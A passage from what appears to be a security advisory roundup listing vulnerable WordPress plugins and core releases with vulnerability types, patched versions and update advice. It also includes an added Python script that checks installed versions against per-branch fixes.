Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: YOP Poll

Vulnerability: Race Condition to Vote Manipulation
Patched Version: 6.5.27
Recommended Action: Update to version 6.5.27, or a newer patched version

Plugin: WP Attachments

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 5.0.5
Recommended Action: Update to version 5.0.5, or a newer patched version

Plugin: Traffic Manager

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Leadster

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: Insert Special Characters

Vulnerability: Prototype Pollution
Patched Version: 1.0.5
Recommended Action: Update to version 1.0.5, or a newer patched version

Plugin: Floating Chat Widget: Contact Chat Icons, Telegram Chat, Line Messenger, WeChat, Email, SMS, Call Button, WhatsApp – Chaty

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via settings
Patched Version: 3.1.3
Recommended Action: Update to version 3.1.3, or a newer patched version

Plugin: Frontend File Manager Plugin

Vulnerability: Cross-Site Request Forgery to File Upload
Patched Version: 21.3
Recommended Action: Update to version 21.3, or a newer patched version

Plugin: cformsII

Vulnerability: SQL Injection
Patched Version: 14.6.10
Recommended Action: Update to version 14.6.10, or a newer patched version

Plugin: External Links – nofollow, noopener & new window

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.81
Recommended Action: Update to version 1.81, or a newer patched version

Plugin: WP Debugging

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.11.8
Recommended Action: Update to version 2.11.8, or a newer patched version

Plugin: Age Gate

Vulnerability: Cross-Site Scripting via Data Import
Patched Version: 2.17.1
Recommended Action: Update to version 2.17.1, or a newer patched version

Plugin: WP Inventory Manager

Vulnerability: Reflected Cross-Site Scripting via ‘message’
Patched Version: 2.1.0.12
Recommended Action: Update to version 2.1.0.12, or a newer patched version

Plugin: WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin

Vulnerability: Authenticated Blind SQL Injection
Patched Version: 9.4.1
Recommended Action: Update to version 9.4.1, or a newer patched version

Plugin: Ultimate Addons for Contact Form 7

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.2.1
Recommended Action: Update to version 3.2.1, or a newer patched version

Plugin: AI ChatBot for WordPress – WPBot

Vulnerability: Unauthenticated PHP Object Injection via Cookies
Patched Version: 4.4.7
Recommended Action: Update to version 4.4.7, or a newer patched version

Plugin: Contact Form Manager

Vulnerability: Cross-Site Scripting
Patched Version: 1.4.4
Recommended Action: Update to version 1.4.4, or a newer patched version

Plugin: Product page shipping calculator for WooCommerce

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via admin settings
Patched Version: 1.3.26
Recommended Action: Update to version 1.3.26, or a newer patched version

Plugin: ActivityPub

Vulnerability: Missing Authorization
Patched Version: 1.0.6
Recommended Action: Update to version 1.0.6, or a newer patched version

Plugin: WordPress RokBox

Vulnerability: Content Spoofing
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: My YouTube Channel

Vulnerability: Cross-Site Request Forgery to Cache Deletion
Patched Version: 3.23.4
Recommended Action: Update to version 3.23.4, or a newer patched version

Plugin: IdeaPush

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 8.53
Recommended Action: Update to version 8.53, or a newer patched version

Plugin: Floating Chat Widget: Contact Chat Icons, Telegram Chat, Line Messenger, WeChat, Email, SMS, Call Button, WhatsApp – Chaty

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.1
Recommended Action: Update to version 3.1, or a newer patched version

Plugin: Font Awesome

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via shortcode
Patched Version: 4.3.2
Recommended Action: Update to version 4.3.2, or a newer patched version

Plugin: Lana Shortcodes

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: Points and Rewards for WooCommerce – Create Loyalty Programs, Reward Customer Purchases, Point Rewards, Referral Points, Reward for Points, User Badges, and Gamification

Vulnerability: Cross-Site Request Forgery to Settings Change
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: Master Elements

Vulnerability: Unauthenticated SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Page Builder: KingComposer – Free Drag and Drop page builder by King-Theme

Vulnerability: Open Redirect
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: ARI Stream Quiz – WordPress Quizzes Builder

Vulnerability: Authenticated (Contributor+) PHP Object Injection
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Plugin: WooCommerce Product Table Lite

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.4.0
Recommended Action: Update to version 2.4.0, or a newer patched version

Plugin: Broadcast Live Video – Live Streaming : HTML5, WebRTC, HLS, RTSP, RTMP

Vulnerability: Cross-Site Scripting
Patched Version: 4.29.5
Recommended Action: Update to version 4.29.5, or a newer patched version

Plugin: Radio Station by netmix® – Manage and play your Show Schedule in WordPress!

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.5.0
Recommended Action: Update to version 2.5.0, or a newer patched version

Plugin: ShiftNav – Responsive Mobile Menu

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: EmbedPress – Embed PDF, PDF 3D FlipBook, Instagram Social Feeds, Google Docs, Vimeo, Wistia, YouTube Videos, Maps & Upload PDF Documents

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.8.4
Recommended Action: Update to version 3.8.4, or a newer patched version

Plugin: Post Views Count (Support caching plugins!)

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Photo Gallery by Ays – Responsive Image Gallery

Vulnerability: Not specified in this listing (affected versions <= 4.4.3)
Patched Version: 4.4.4
Recommended Action: Update to version 4.4.4, or a newer patched version

Plugin: MainWP Code Snippets Extension

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: 4.0.3
Recommended Action: Update to version 4.0.3, or a newer patched version

Plugin: Simple Blog Card

Vulnerability: Sensitive Information Exposure
Patched Version: 1.32
Recommended Action: Update to version 1.32, or a newer patched version

Plugin: ANAC XML Bandi di Gara

Vulnerability: Cross-Site Request Forgery via settings.php
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: DVS Custom Notification

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Advanced Custom Fields (ACF)

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting
Patched Version: 5.7.8
Recommended Action: Update to version 5.7.8, or a newer patched version

Plugin: WSM Downloader

Vulnerability: Arbitrary File Download
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Solidres – Hotel booking plugin for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: NotificationX – Live Sales Notification, WooCommerce Sales Popup, FOMO, Social Proof, Announcement Banner & Floating Notification Top Bar

Vulnerability: SQL Injection
Patched Version: 2.3.12
Recommended Action: Update to version 2.3.12, or a newer patched version

Plugin: Product Catalog Simple

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 1.5.13
Recommended Action: Update to version 1.5.13, or a newer patched version

Core: WordPress

Vulnerability: Privilege Escalation via XML-RPC
Patched Version: 3.7.35
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.35, 3.8.35, 3.9.33, 4.0.32, 4.1.32, 4.2.29, 4.3.25, 4.4.24, 4.5.23, 4.6.20, 4.7.19, 4.8.15, 4.9.16, 5.0.11, 5.1.7, 5.2.8, 5.3.5, 5.4.3, 5.5.2
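Because the core entry above names one fixed release per maintained branch, "am I patched?" is not a string comparison: 4.9.14 sorts above 3.7.35 yet is still vulnerable until 4.9.16, and a plugin at "1.38" sorts below "1.4" as text. The Python script below is an added example, not part of this roundup or of any vendor tooling. It parses entries written in this page's own Plugin/Core, Vulnerability, Patched Version, Recommended Action layout, decides whether an installed version is at or above the fix for its own major.minor branch (or above the newest listed fix, for a release line newer than any the entry names), and flags entries that have no fix at all. The three advisories and the installed-version inventory embedded in it are constructed from entries on this page; in practice the inventory would come from `wp core version` and `wp plugin list --format=json`.

```python
import re
from dataclasses import dataclass

# Constructed sample in this page's own entry layout: three entries copied from the
# roundup so the parser and the version check can run offline.
SAMPLE_ADVISORIES = """\
Plugin: WP Inventory Manager

Vulnerability: Reflected Cross-Site Scripting via 'message'
Patched Version: 2.1.0.12
Recommended Action: Update to version 2.1.0.12, or a newer patched version

Core: WordPress

Vulnerability: Privilege Escalation via XML-RPC
Patched Version: 3.7.35
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.35, 3.8.35, 3.9.33, 4.0.32, 4.1.32, 4.2.29, 4.3.25, 4.4.24, 4.5.23, 4.6.20, 4.7.19, 4.8.15, 4.9.16, 5.0.11, 5.1.7, 5.2.8, 5.3.5, 5.4.3, 5.5.2

Plugin: Traffic Manager

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance.
"""

# Constructed inventory standing in for `wp core version` / `wp plugin list` output.
SAMPLE_INVENTORY = {
    "WP Inventory Manager": "2.1.0.9",  # as text "2.1.0.9" > "2.1.0.12"; numerically it is below the fix
    "WordPress": "4.9.14",              # above 3.7.35, but the 4.9 branch needs 4.9.16
    "Traffic Manager": "1.4.5",         # no fix exists at any version
}

VERSION_RE = re.compile(r"\b\d+(?:\.\d+)*\b")


@dataclass
class Advisory:
    kind: str           # "Plugin" or "Core"
    name: str
    vulnerability: str
    patched: list       # every fixed release the entry names; empty when no fix exists


def parse_version(text: str) -> tuple:
    """'2.1.0.12' -> (2, 1, 0, 12); a non-numeric tail such as '-beta' is dropped."""
    parts = []
    for piece in text.strip().split("."):
        m = re.match(r"\d+", piece)
        if not m:
            break
        parts.append(int(m.group()))
    return tuple(parts)


def version_ge(a: str, b: str) -> bool:
    """Numeric a >= b, zero-padded so that '2.2' and '2.2.0' compare equal."""
    ta, tb = parse_version(a), parse_version(b)
    width = max(len(ta), len(tb))
    return ta + (0,) * (width - len(ta)) >= tb + (0,) * (width - len(tb))


def parse_advisories(text: str) -> list:
    """Split the listing on blank lines that precede a 'Plugin:' or 'Core:' header."""
    advisories = []
    for block in re.split(r"\n\s*\n(?=(?:Plugin|Core): )", text.strip()):
        fields = {}
        for line in block.splitlines():
            key, sep, value = line.partition(": ")
            if sep:
                fields[key.strip()] = value.strip()
        kind = "Core" if "Core" in fields else "Plugin"
        patched_field = fields.get("Patched Version", "")
        if patched_field.lower().startswith("no patched"):
            patched = []
        else:
            # The action line carries the full per-branch list for core entries.
            found = VERSION_RE.findall(fields.get("Recommended Action", ""))
            patched = list(dict.fromkeys([patched_field] + found))
        advisories.append(Advisory(kind, fields.get(kind, ""),
                                   fields.get("Vulnerability", ""), patched))
    return advisories


def is_patched(installed: str, patched: list) -> bool:
    """Fixed if at or above the fix for the installed major.minor branch, or above
    every listed fix (a release line newer than any the advisory names)."""
    if not patched:
        return False
    branch = parse_version(installed)[:2]
    same_branch = [v for v in patched if parse_version(v)[:2] == branch]
    if same_branch:
        return any(version_ge(installed, v) for v in same_branch)
    return version_ge(installed, max(patched, key=parse_version))


def assess(inventory: dict, advisories: list) -> dict:
    """Map each installed, affected component to 'ok' or a VULNERABLE status line."""
    report = {}
    for adv in advisories:
        installed = inventory.get(adv.name)
        if installed is None:
            continue
        if not adv.patched:
            report[adv.name] = "VULNERABLE (no fix available; mitigate or remove): " + adv.vulnerability
        elif is_patched(installed, adv.patched):
            report[adv.name] = "ok"
        else:
            report[adv.name] = "VULNERABLE (update to %s or newer): %s" % (
                ", ".join(adv.patched), adv.vulnerability)
    return report


if __name__ == "__main__":
    for name, status in assess(SAMPLE_INVENTORY, parse_advisories(SAMPLE_ADVISORIES)).items():
        print(f"{name}: {status}")
```

Run as-is it reports all three constructed components as vulnerable, for three different reasons: a numeric-versus-lexical version mismatch, a branch whose own backport is behind, and an entry with no fix. The branch rule is deliberately conservative: a site on 4.9.10 is not considered fixed because 4.8.15 is listed below it, only because 4.9.16 is the fix for its line.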

Plugin: Watu Quiz

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.3.8.2
Recommended Action: Update to version 3.3.8.2, or a newer patched version

Plugin: WooCommerce

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.6.9
Recommended Action: Update to version 2.6.9, or a newer patched version

Plugin: Securimage-WP

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Tidio Gallery

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WHA Puzzle

Vulnerability: Authenticated (Contributor+) Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP htpasswd

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Social Share Buttons by Supsystic

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 2.2.7
Recommended Action: Update to version 2.2.7, or a newer patched version

Plugin: Bit File Manager – 100% Free & Open Source File Manager and Code Editor for WordPress

Vulnerability: Cross-Site Request Forgery to Arbitrary File Upload
Patched Version: 4.1.5
Recommended Action: Update to version 4.1.5, or a newer patched version

Plugin: Email Newsletter

Vulnerability: Sensitive Information Disclosure
Patched Version: 9.0
Recommended Action: Update to version 9.0, or a newer patched version

Plugin: iframe

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via ‘iframe’ Shortcode
Patched Version: 4.7
Recommended Action: Update to version 4.7, or a newer patched version

Plugin: MC4WP: Mailchimp for WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.8.5
Recommended Action: Update to version 4.8.5, or a newer patched version

Plugin: WP Hotel Booking

Vulnerability: Insufficient Authorization to Unauthorized Post Deletion
Patched Version: 2.0.9
Recommended Action: Update to version 2.0.9, or a newer patched version

Plugin: Fast Flow

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.12
Recommended Action: Update to version 1.2.12, or a newer patched version

Core: WordPress

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 3.7.34
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.34, 3.8.34, 3.9.32, 4.0.31, 4.1.31, 4.2.28, 4.3.24, 4.4.23, 4.5.22, 4.6.19, 4.7.18, 4.8.14, 4.9.15, 5.0.10, 5.1.6, 5.2.7, 5.3.4, 5.4.2

Plugin: Appointment Hour Booking – WordPress Booking Plugin

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.3.56
Recommended Action: Update to version 1.3.56, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 2.3.3
Recommended Action: Update to version 2.3.3, or a newer patched version

Plugin: WP Insurance – WordPress Insurance Service Plugin

Vulnerability: Cross-Site Request Forgery leading to Arbitrary Plugin Activation
Patched Version: 2.1.4
Recommended Action: Update to version 2.1.4, or a newer patched version

Plugin: WP Fastest Cache

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 0.9.5
Recommended Action: Update to version 0.9.5, or a newer patched version

Plugin: tagDiv Composer

Vulnerability: Reflected Cross-Site Scripting via ‘td_video_url’
Patched Version: 4.0
Recommended Action: Update to version 4.0, or a newer patched version

Plugin: WP Total Hacks

Vulnerability: Authenticated (Subscriber+) Plugin Options Update to Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: YITH WooCommerce Wishlist

Vulnerability: SQL Injection
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: WP Content Pilot – Autoblogging & Affiliate Marketing Plugin

Vulnerability: Authenticated (Contributor+) Content Injection
Patched Version: 1.3.4
Recommended Action: Update to version 1.3.4, or a newer patched version

Plugin: Visual Form Builder

Vulnerability: Cross-Site Request Forgery to SQL Injection
Patched Version: 2.8.3
Recommended Action: Update to version 2.8.3, or a newer patched version

Plugin: WP RSS By Publishers

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WCFM Membership – WooCommerce Memberships for Multivendor Marketplace

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.10.0
Recommended Action: Update to version 2.10.0, or a newer patched version

Plugin: Duplicator – Backups & Migration Plugin – Cloud Backups, Scheduled Backups, & More

Vulnerability: SQL Injection
Patched Version: 0.5.16
Recommended Action: Update to version 0.5.16, or a newer patched version

Plugin: WP Flipclock

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.8
Recommended Action: Update to version 1.8, or a newer patched version

Plugin: Rate My Post – Star Rating Plugin by FeedbackWP

Vulnerability: Race Condition
Patched Version: 3.3.5
Recommended Action: Update to version 3.3.5, or a newer patched version

Plugin: Stock Manager for WooCommerce

Vulnerability: Cross-Site Request Forgery to Arbitrary File Upload
Patched Version: 2.6.0
Recommended Action: Update to version 2.6.0, or a newer patched version

Plugin: Ninja Job Board – Ultimate WordPress Job Board Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 1.3.3
Recommended Action: Update to version 1.3.3, or a newer patched version

Plugin: Caldera Forms – More Than Contact Forms

Vulnerability: Sensitive Information Disclosure
Patched Version: 1.4.0
Recommended Action: Update to version 1.4.0, or a newer patched version

Plugin: Workscout Core

Vulnerability: Not specified in this listing (the source names only "Job Board WordPress Theme <= 2.0.31")
Patched Version: 1.3.4
Recommended Action: Update to version 1.3.4, or a newer patched version

Plugin: WP-Members Membership Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.8.10
Recommended Action: Update to version 2.8.10, or a newer patched version

Plugin: Ad Inserter – Ad Manager & AdSense Ads

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.7.10
Recommended Action: Update to version 2.7.10, or a newer patched version

Plugin: Rearrange Woocommerce Products

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 3.0.8
Recommended Action: Update to version 3.0.8, or a newer patched version

Plugin: WP Maintenance Mode & Site Under Construction

Vulnerability: Improper Authorization
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: GigPress

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.3.28
Recommended Action: Update to version 2.3.28, or a newer patched version

Plugin: Stylish Price List – Price Table Builder & QR Code Restaurant Menu

Vulnerability: Missing Authorization
Patched Version: 6.9.1
Recommended Action: Update to version 6.9.1, or a newer patched version

Plugin: Admin Bar & Dashboard Access Control

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.2.9
Recommended Action: Update to version 1.2.9, or a newer patched version

Plugin: Owl Carousel

Vulnerability: Missing Authorization via save_paramter.php
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Media File Manager

Vulnerability: Directory Traversal to Arbitrary File Read
Patched Version: 1.4.3
Recommended Action: Update to version 1.4.3, or a newer patched version

Plugin: Contextual Related Posts

Vulnerability: Missing Authorization in crp_ajax_clearcache
Patched Version: 3.3.2
Recommended Action: Update to version 3.3.2, or a newer patched version

Plugin: OpenHook

Vulnerability: Authenticated (Subscriber+) Remote Code Execution via Shortcode
Patched Version: 4.3.1
Recommended Action: Update to version 4.3.1, or a newer patched version

Plugin: Error Log Viewer by BestWebSoft

Vulnerability: Arbitrary File Deletion
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: IP Blacklist Cloud

Vulnerability: SQL Injection
Patched Version: 3.41
Recommended Action: Update to version 3.41, or a newer patched version

Plugin: Product Stock Manager

Vulnerability: Missing Authorization and Cross-Site Request Forgery
Patched Version: 1.0.5
Recommended Action: Update to version 1.0.5, or a newer patched version

Plugin: Checkout Field Manager (Checkout Manager) for WooCommerce

Vulnerability: Unauthenticated Arbitrary Media Deletion
Patched Version: 4.3
Recommended Action: Update to version 4.3, or a newer patched version

Plugin: Easy Google Analytics for WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Official Integration for Billingo

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.4.0
Recommended Action: Update to version 3.4.0, or a newer patched version

Plugin: SP Project & Document Manager

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: 4.68
Recommended Action: Update to version 4.68, or a newer patched version

Plugin: Simple Job Board

Vulnerability: Not specified in this listing
Patched Version: 2.9.5
Recommended Action: Update to version 2.9.5, or a newer patched version

Plugin: BA Book Everything

Vulnerability: Cross-Site Scripting and Cross-Frame Scripting
Patched Version: 1.3.25
Recommended Action: Update to version 1.3.25, or a newer patched version

Plugin: Elementor Website Builder – More than Just a Page Builder

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via title_size
Patched Version: 3.1.4
Recommended Action: Update to version 3.1.4, or a newer patched version

Plugin: WP Live.php

Vulnerability: Cross-Site Scripting
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 2.0.6
Recommended Action: Update to version 2.0.6, or a newer patched version

Plugin: WP Default Feature Image

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.7.30
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.30, 3.8.30, 3.9.28, 4.0.27, 4.1.27, 4.2.24, 4.3.20, 4.4.19, 4.5.18, 4.6.15, 4.7.14, 4.8.10, 4.9.11, 5.0.6, 5.1.2, 5.2.3

Plugin: EazyDocs – Most Powerful Knowledge base, wiki, Documentation Builder Plugin

Vulnerability: Unauthenticated Stored Cross-Site Scripting via edit_doc_one_page
Patched Version: 2.3.6
Recommended Action: Update to version 2.3.6, or a newer patched version

Plugin: Post SMTP – WordPress SMTP Plugin with Email Logs and Mobile App for Failure Notifications – Gmail SMTP, Office 365, Brevo, Mailgun, Amazon SES and more

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 2.6.1
Recommended Action: Update to version 2.6.1, or a newer patched version

Plugin: mb.miniAudioPlayer – an HTML5 audio player for your mp3 files

Vulnerability: Multiple Vulnerabilities
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Countdown, Coming Soon, Maintenance – Countdown & Clock

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.2.9
Recommended Action: Update to version 2.2.9, or a newer patched version

Plugin: Login with phone number

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.2
Recommended Action: Update to version 1.4.2, or a newer patched version

Plugin: Everest Forms – Build Contact Forms, Surveys, Polls, Quizzes, Newsletter & Application Forms, and Many More with Ease!

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.0.5
Recommended Action: Update to version 2.0.5, or a newer patched version

Plugin: Plausible Analytics

Vulnerability: Missing Authorization
Patched Version: 1.2.4
Recommended Action: Update to version 1.2.4, or a newer patched version

Plugin: Blog Manager Light

Vulnerability: Cross-Site Request Forgery via bml_settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Automatic Domain Changer

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.3
Recommended Action: Update to version 2.0.3, or a newer patched version

Plugin: White Label – WordPress Custom Admin, Custom Login Page, and Custom Dashboard

Vulnerability: Cross-Site Request Forgery via white_label_reset_wl_admins
Patched Version: 2.9.1
Recommended Action: Update to version 2.9.1, or a newer patched version

Plugin: WatchTowerHQ

Vulnerability: Unauthenticated Arbitrary File Deletion
Patched Version: 3.6.16
Recommended Action: Update to version 3.6.16, or a newer patched version

Plugin: Analytics for Woo – Putler Accurate Analytics and Reports for your WooCommerce Store

Vulnerability: Missing Authorization via ‘send_resync_request’
Patched Version: 2.13.0
Recommended Action: Update to version 2.13.0, or a newer patched version

Plugin: Yoast SEO

Vulnerability: Authenticated (SEO Manager+) Stored Cross-Site Scripting
Patched Version: 21.1
Recommended Action: Update to version 21.1, or a newer patched version

Plugin: surveys

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: VikBooking Hotel Booking Engine & PMS

Vulnerability: Cross-Site Request Forgery in saveconfig function
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: tagDiv Composer

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 4.2
Recommended Action: Update to version 4.2, or a newer patched version

Plugin: RokNewsPager

Vulnerability: Denial of Service
Patched Version: 1.18
Recommended Action: Update to version 1.18, or a newer patched version

Plugin: SS Downloads

Vulnerability: Cross-Site Scripting
Patched Version: 1.5
Recommended Action: Update to version 1.5, or a newer patched version

Plugin: Return Refund and Exchange For WooCommerce – Return Management System, RMA Exchange, Wallet And Cancel Order Features

Vulnerability: Arbitrary File Upload
Patched Version: 4.0.9
Recommended Action: Update to version 4.0.9, or a newer patched version

Plugin: Easy PayPal Events

Vulnerability: Reflected Cross-Site Scripting via Page
Patched Version: 1.1.7
Recommended Action: Update to version 1.1.7, or a newer patched version

Plugin: Booking Package

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.11
Recommended Action: Update to version 1.5.11, or a newer patched version

Plugin: OTP Login Woocommerce (Login with OTP)

Vulnerability: Cross-Site Scripting
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: LearnPress – WordPress LMS Plugin

Vulnerability: Missing Authorization
Patched Version: 4.2.3.1
Recommended Action: Update to version 4.2.3.1, or a newer patched version

Core: WordPress

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting via Customizer
Patched Version: 3.7.40
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.40, 3.8.40, 3.9.38, 4.0.37, 4.1.37, 4.2.34, 4.3.30, 4.4.29, 4.5.28, 4.6.25, 4.7.25, 4.8.21, 4.9.22, 5.0.18, 5.1.15, 5.2.17, 5.3.14, 5.4.12, 5.5.11, 5.6.10, 5.7.8, 5.8.6, 5.9.5, 6.0.3

Plugin: Leaflet Maps Marker Pro

Vulnerability: Cross-Site Scripting
Patched Version: 1.5.8
Recommended Action: Update to version 1.5.8, or a newer patched version

Plugin: Enable Media Replace

Vulnerability: Authenticated (Author+) Arbitrary File Upload
Patched Version: 4.0.2
Recommended Action: Update to version 4.0.2, or a newer patched version

Plugin: Visual Slide Box Builder

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ultimate Addons for Beaver Builder

Vulnerability: Authenticated (Contributor+) Directory Traversal to Arbitrary File Download
Patched Version: 1.35.14
Recommended Action: Update to version 1.35.14, or a newer patched version

Plugin: Booster Plus for WooCommerce

Vulnerability: Missing Authorization to Order Information Disclosure
Patched Version: 7.1.2
